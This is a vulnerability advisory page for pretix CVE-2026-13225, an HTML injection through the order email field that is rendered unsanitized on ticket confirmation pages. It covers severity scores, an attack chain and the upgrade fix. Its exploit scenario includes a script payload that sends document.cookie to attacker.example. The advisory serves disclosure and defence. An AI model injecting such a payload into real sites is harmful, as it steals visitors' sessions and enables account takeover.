Skip to main content

pretix CVE-2026-13225

| EUVDEUVD-2026-39418 MEDIUM
Basic XSS (CWE-80)
2026-06-25 rami.io GHSA-g3hf-77hr-rvcr
5.3
CVSS 4.0 · Vendor: rami.io
Share

Severity by source

Vendor (rami.io) PRIMARY
5.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network-accessible unauthenticated input triggers scope change as injected script executes in victim's browser; no availability impact applies to basic XSS.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:N/SA:N

Primary rating from Vendor (rami.io).

CVSS VectorVendor: rami.io

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jun 25, 2026 - 16:03 EUVD
Analysis Generated
Jun 25, 2026 - 15:20 vuln.today

DescriptionCVE.org

Malicious HTML content could be injected into the email address of an order, which pretix showed without sanitization on the confirmation page for individual tickets in that order.

AnalysisAI

HTML injection on pretix's individual ticket confirmation page allows unsanitized email address content to execute arbitrary HTML - including scripts - in the browser of anyone who views that page. The injection point is the email address field submitted at order creation, which pretix stored and rendered without output encoding on the per-ticket confirmation view. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Submit order with HTML payload in email field
Delivery
pretix stores unsanitized email server-side
Exploit
Victim opens individual ticket confirmation page
Execution
Browser interprets injected HTML tags
Persist
Attacker JavaScript executes in victim's browser context
Impact
Session data or credentials exfiltrated

Vulnerability AssessmentAI

Exploitation No authentication or existing account is required - the attack is initiated by submitting an order, which is available to any unauthenticated visitor of the pretix shop. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.3 (AV:N/AC:L/AT:N/PR:N/UI:P) correctly captures moderate real-world priority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker navigates to a pretix-powered event shop and registers an order using an email address containing a malicious HTML payload such as `<script>fetch('https://attacker.example/log?c='+document.cookie)</script>`. When a ticket holder or event organizer subsequently opens the individual ticket confirmation page for that order, the injected script executes in their browser session, potentially exfiltrating session cookies, rendering a phishing overlay, or performing actions on behalf of the logged-in user.
Remediation Upgrade pretix to version 2026.5.2 or later, as documented in the vendor release blog at https://pretix.eu/about/en/blog/20260625-release-2026-5-2/. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Pretix

View all
CVE-2024-27447 CRITICAL
9.8 Feb 26

pretix before 2024.1.1 mishandles file validation. Rated critical severity (CVSS 9.8), this vulnerability is remotely ex

CVE-2026-57532 HIGH
8.8 Jun 25

Stored cross-site scripting in Pretix's PDF ticket and badge layout editor allows one backend user to inject JavaScript

CVE-2023-44464 HIGH
7.8 Sep 29

pretix before 2023.7.2 allows Pillow to parse EPS files. Rated high severity (CVSS 7.8), this vulnerability is no authen

CVE-2026-13602 HIGH
7.7 Jul 01

Privilege escalation to full account takeover in pretix (open-source event ticketing) and its payment integration plugin

CVE-2023-27891 HIGH
7.5 Mar 06

rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. Rated high severity (CVSS

CVE-2024-8113 HIGH
7.2 Aug 23

Stored XSS in organizer and event settings of pretix up to 2024.7.0 allows malicious event organizers to inject HTML tag

CVE-2026-2451 MEDIUM
6.5 Feb 16

Information disclosure in Pretix email template processing allows authenticated backend users to extract sensitive syste

CVE-2026-2452 MEDIUM
6.5 Feb 16

Information disclosure in Pretix email template processing allows authenticated backend users to extract sensitive syste

CVE-2026-2415 MEDIUM
5.9 Feb 16

Pretix email template placeholder injection enables authenticated backend users to extract sensitive system information

CVE-2026-5600 MEDIUM
5.5 Apr 08

Pretix 2025 and 2026 versions contain an API endpoint authorization bypass that returns all check-in events for an organ

CVE-2023-44463 MEDIUM
5.3 Oct 02

An issue was discovered in pretix before 2023.7.1. Rated medium severity (CVSS 5.3), this vulnerability is remotely expl

CVE-2026-11764 LOW
3.6 Jun 09

Gift card secret exposure in pretix event ticketing software allows a highly privileged user who lacks explicit gift car

Share

CVE-2026-13225 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy